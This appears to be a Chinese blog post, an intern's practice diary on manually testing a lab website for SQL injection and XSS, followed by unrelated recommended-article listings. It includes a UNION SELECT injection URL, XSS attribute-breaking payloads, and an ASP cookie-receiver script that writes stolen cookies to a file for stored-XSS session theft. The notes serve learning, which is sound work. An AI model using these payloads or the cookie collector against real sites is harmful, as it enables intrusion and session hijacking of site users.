2017.4.20 总结

最新推荐文章于 2021-05-17 20:43:41 发布
最新推荐文章于 2021-05-17 20:43:41 发布
阅读量426 收藏
点赞数
分类专栏: 学习记录 实习日记 每日F-Q
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_28921653/article/details/70306400
版权

测SQL注入:

列出所有提交到服务器的参数

位置分别有

  • url
  • 请求主体
  • http头部

手工测试:

  • 单引号测试

  • and测试

  • order by 猜字段数
    order by原理?

  • union select爆数据库信息
    union select原理?

http://192.168.100.48:88/admin/admin_update.php?id=1 and 1=2 UNION SELECT 1,database(),3,4,5,6,7,8,9,10

测XSS:

反射型xss

sql的注入点也可以是xss的注入点,即同参数。

本质是:未充分过滤的参数

存储型xss

一般出现在留言板或者新建任务,发布公告的地方。

打cookie

cookie接受地址

http://192.168.100.83/cookie.asp

cookie.asp

<html>

<title>xx</title>

<body>

<%testfile = Server.MapPath("code.txt") //先构造一个路径,也就是取网站根目录,创造一个在根目录下的code.txt路径,保存在testfile中

msg = Request("msg") //获取提交过来的msg变量,也就是cookie值

set fs = server.CreateObject("scripting.filesystemobject")//创建一个fs对象

set thisfile = fs.OpenTextFile(testfile,8,True,0)

thisfile.WriteLine(""&msg&"")//像code.txt中写入获取来的cookie

thisfile.close() //关闭

set fs = nothing%>

</body>

</html>

攻击代码:

拿到cookie

用户进入到有存储型xss的页面的时候,cookie就会自动发送到你服务器上的cookie.asp

问题:

  • 面对一个网站,有那么多页面和参数,该从何下手?
  • 渗透思路是?

tips:

经验还是不够,对于一些原理的认识还是局限于原来的那几个例子,有点受到定向思维的干扰。

手工xss挖掘时候,思路还是很混乱。

比较清晰的思路应该是

  • 输入fuzz字段
  • 找到输出的位置
  • 看看在基于输出的环境,能否构造xss

有一个很关键的地方就是能不能闭合<>,或者其目的就是在一个闭合的环境下输出自己js代码

<input name=keyword value='input'>

payload=’> <script>alert(/xss/)</script>
完整语句:<input name=keyword value='’> <script>alert(/xss/)</script>'>

如果用不了尖括号,可以用单引号或双引号闭合
payload= ' oninput=alert1//'
完整语句:<input name=keyword value='' oninput=alert1//''>

感想:

算是做了一个比较完整的练习,一个基于phpmywind源码搭建的网站。

以上的点,基本上都有了个印象。
sql注入、xss手工挖掘的测试思路慢慢熟练。

知识点:

中间件:

  • Apache
  • iis
  • phpmyadmin
  • weblogic

web服务组件

(
横向的层,纵向就是数据流

Anonymity_J
关注
专栏目录
Unity2017.4版本的中文离线文档.zip
02-06
该 zip 文件包含Unity2017.4的中文版手册和 Unity Scripting API,配置过程见https://blog.csdn.net/qq_43085008/article/details/113706273
Xilinx_Vivado_SDK_2017.rar
09-21
这个资源和教程是综合网上一些信息,亲测有效(2019年9月20日)总结起来的,上传一下,节省大家一些时间。如果安装过程中出现安装vivado中提示VC有错误,请取消安装,点开主页找“安装vivado中提示VC有错误”资源,...
2017.4.20
Cxjsetc的博客
04-20 295
今天整理了上周周末的笔记 顺便复习了下 明天的计划是看3 4章的运算符跟语句知识。 复习了上周的几个小程序 1 用户 useradd chuxin [root@localhost ~]# su chuxin [chuxin@localhost root]$ exit exit [root@localhost ~]# passwd Changing password for user
Unity2017.x 版本的下载安装
weixin_30896825的博客
09-16 447
Unity2017 版本从2017年7月开始正式发布Unity2017.1版本,为了初学者更加清晰明了的掌握全过程,笔者还是以完整的共19个步骤来给大家演示下载与配置安装的全过程,方便广大读者的无障碍学习。 步骤1: 首先在浏览器中键入:http://www.unity3d.com/ 网址,进入官方首页。对于一些重大版本的发布期间,Untiy官方一般会在首页就直接给出下载链接或者按钮。而对于其...
Unity 2017.4.1f1 (64-bit)配置Android环境,打包发布Apk流程详解
tpz789的博客
03-02 5882
标题 Unity 2017.4.1f1 (64-bit)配置Android环境,打包发布Apk流程详解 1、Java SDK的环境配置 (1)前往ORACLE的官网下载Java SE Development Kit 8并安装 https://www.oracle.com/technetwork/java/javase/downloads/jdk8-downloads-2133151.html ...
2017.08.20王雪婷1
08-08
2017.08.20王雪婷学习笔记】 本周,王雪婷同学主要专注于Python编程语言的学习,特别是通过"莫烦Python"的系列视频进行了深入学习,并尝试在本地计算机上安装TensorFlow框架。以下是她的学习重点: 1. **Python...
消防记忆总结2017.10.10.pdf
10-28
这种泡沫液添加了人工合成碳氢表面活性剂,发泡倍数在20~30之间,以提高灭火效率和稳定性。 接下来,关于火灾自动报警系统的设置,根据《建筑设计防火规范》GB50016-2014,以下场所应设置火灾自动报警系统: 1. 占...
Steema TeeChart Pro VCL FMX 2017.20 Full Source for D10.2 Tokyo
08-08
总结起来,"Steema TeeChart Pro VCL FMX 2017.20 Full Source for D10.2 Tokyo"是一个强大的图表解决方案,它的全源码开放为开发者提供了宝贵的教育资源,无论是学习图表技术,还是进行定制化开发,都能从中获益匪...
高考数学一轮复习方法总结2017.docx
12-05
4. **强化技能训练**:包括计算、推理、作图和语言表达等技能,应做到规范且熟练。解题过程应体现数学思维方法,明确每一步的依据。 5. **提高阅读分析能力**:培养良好的读题习惯,多次阅读题目以避免误解。充分...
Unity2017.4.3f1.exe
03-01
Unity2017.4.3f1安装包下载程序,官方渠道,希望对大家有所帮助
UNITY历史版本下载列表
huang714的专栏
06-08 9136
Unity历史版本下载列表 Unity2019系列最新版本:Unity 2019.1.3 Unity2018系列最新版本:Unity 2018.4.0 Unity2017系列最新版本:Unity 2017.4.27 Unity5.x系列最新版本:Unity 5.6.7 Unity4.x系列最新版本:Unity 4.7.2 Unity3.x系列最新版本:Unity 3.5.7 注:最后更新2019.05.22 [UnityHub] For Mac:https://public-cdn.cloud..
Unity 2017.4 升级 2018.3
weixin_34248849的博客
10-26 1931
环境 Unity 2017.4.2f2 Unity 2018.3.0b3 macOS 10.13.6 功能介绍 主要功能 Preview of 2018.3 features - Unity Forum 粒子系统升级 Particle System Improvements - Google 文档 升级文档 官方升级文档草案 DRAFT Upgrade Guide 2018...
Unity2017.4.35f1发布安卓
qq_40544338的博客
01-20 1671
目录 一、目的: 1、因为之前使用的都是5.6.3f1版本,现在因为使用OpencvForUnity所以需要使用到Unity2017版本;目前使用的是Unity2017.4.35f1(是通过UnityHub下载的,并且选择了安卓模块),使用5.6.3的方法发布无法成功,需要重新设置 一、参考: 1、Unity 2017版本安卓打包配置 ①总结:待处理 2、Unity3D 发布AP...
截止2021年5月17日,从5.6到2021所有的unity版本下载地址。
xinje的专栏
05-17 6286
首先,unity3d 2021版本确实从一些方面进行了更新,但是unity HUB的安装也确实挺麻烦。听说有大神可以绕过HUB,但我没有成功。 其次,unity3d从2018开始,国内外用着两个不同的版本。国内版本主文件加壳,PJ带来困难。国外版本不好获得。你可以尝试进入英文官网,发现下载页面打不开,因为我们国内的IP被屏蔽了,包括部分台湾的IP。HUB内部安装并没有国外的版本。你用科学上网的方法可以下载,但科学上网是违法的哦。 另外,PJ的方法在这篇中就不再提及了,我分开文章说明。 所以,这篇笔记,
Unity2019创建工程失败+时间报错:已解决(防火墙关闭导致,使得它无法访问网络,许可证出现问题)
qq_40544338的博客
04-06 5874
一、目的 1、想知道:windows10更新最新的系统后Unity2019创建工程就失败 问题情况: 今天更新了windows10系统,发现Unity2017.4.35c1没有问题,但是Unity2019.4.9f1、Unity2019.4.19f1、Unity2019.4.20f1c1创建新工程,点击play就直接报错了,所以猜测是不是系统更新导致的,然后下载了Unity2019.4.21f1还是这个情况。 二、参考 1、 三、操作 ...
越权、cookie与session、认证和授权
热门推荐
foolisheddy
05-24 1万+
越权修改 疑问开始 例子 黑盒 白盒 修复后的代码 session session id 是从哪里开始就有的 session 保存在哪 session_start等函数所做的实际操作是什么 测试会话固定 cookie cookie保存在哪里 cookie名称在哪定义 什么时候服务器给用户cookie 认证和授权 什么是认证和授权 基本认证机制 1认证 1 HTTP的质询响应认证框架 2 认证协议与
2017.4.10 学习记录与感想 (xss、ctf、学习感想)
foolisheddy
04-10 6398
xss ctf 学习感想
2017.4.26 补天挖洞
foolisheddy
05-04 2249
绕过 任意密码重置 挖洞 存储型xss tips 碎碎念 子域名挖掘 sql注入 渗透测试思路 绕过输入手机号,截包,本地检测修改包参数为true。任意密码重置修改密码处,修改用户名参数,如果服务器没有进行多的验证,可以进行任意用户密码重置。 什么情况下不能进行用户密码重置呢? 本质是? 挖洞存储型xss在修改个人资料处,插入<script>xss</script>,保存修改后,页面弹框。这个时候,
2017商务总结:蓝色科技公司年度报告与20XX战略规划
1. 年度工作概述:这一章总结2017年的关键业绩,包括经营业绩的提升、行业地位的稳固和社会形象的改善。它强调了团队合作和集体努力的重要性。 2. SWOT分析: - 优势:这部分列出了公司在过去一年中的强项,可能...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值